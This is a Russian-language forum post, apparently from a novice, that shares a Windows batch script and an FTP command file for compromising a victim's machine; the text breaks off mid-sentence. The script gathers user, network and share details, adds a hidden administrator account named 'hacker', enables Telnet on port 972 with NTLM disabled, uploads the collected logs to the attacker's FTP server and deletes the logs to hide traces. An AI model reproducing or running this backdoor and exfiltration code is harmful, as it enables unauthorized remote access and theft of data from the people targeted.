Я полный новичок, так что прошу сильно не пинать ! Я знаю что про Telnet написано выше крыши, но йя хотел бы показать слегка доведенный до ума скрипт.

Тело скрипта:
net user > c:windowsuser.log //Собирает инфу о Юзверях
ipconfig /all > c:windowsipconf.log //Собирает и запихивает в файл инфу про IP
route print > c:windowsroute.log //Собирает и запихивает в файл инфу о сетевых маршрутах
net share > c:windowsshare.log // Инфа о ресурсах
ver > c:windowsver.log //Ну и самое главное, версия и сборка винды)))
chcp 1251 //Кусок кода дальше я позаимствовал в статье "Взлом через Telnet" или как-то так...
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/SpecialAccounts/UserList" /v hacker /t REG_DWORD /d 00000000
ftp -s:TAR_BZ.TXT //Здесь подрубаемся к FTP и скидываем данные себе на комп (При этом задействуется левый фаил в катором содержется код для FTP)
del c:windowsuser.log //Здесь зачищаем следы...
del c:windowsipconf.log
del c:windowsroute.log
del c:windowsshare.log
del c:windowsver.log
exit //Без комментариев

Вот тело TAR_BZ.TXT (я незнаю почему йя его так назвал....):
open xxx.xxx.xxx.xxx //Залазим на свой FTP (место xxx.xxx.xxx.xxx ставим IP (желательно свой:)))
login //Здесь пишем логин
pass //Здесь пасс
put c:windowsuser.log //Логи идут к нам... )))
put c:windowsipconf.log
put c:windowsroute.log
put c:windowsshare.log
put c:windowsver.log
bye //Отрубаемся от FTP

Работает это (если кто непонял) так, запустив файл, жертва (подставляет сама себя)))) тупо скидывает все данные о инете и открывает Telnet на порте 972. Мы тупо ищем